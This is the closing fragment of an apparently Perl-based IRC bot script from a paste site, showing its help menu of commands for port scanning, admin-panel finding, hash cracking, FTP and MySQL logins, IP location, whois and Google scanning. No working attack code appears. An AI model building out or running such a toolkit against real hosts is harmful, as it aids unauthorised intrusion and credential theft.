- [++] cmd_decodebase <text>
- [++] cmd_scanport <host>
- [++] cmd_panel <page>
- [++] cmd_getpass <hash>
- [++] cmd_kobra <page>
- [++] cmd_ftp <host> <user> <pass>
- [++] cmd_mysql <host> <user> <pass>
- [++] cmd_locate <ip>
- [++] cmd_whois <dom>
- [++] cmd_navegator
- [++] cmd_scangoogle
- [++] cmd_help
- [++] cmd_exit
- );
- cprint "\n\n\n\x030";
- }
- # The End ?
Add Comment
Please, Sign In to add comment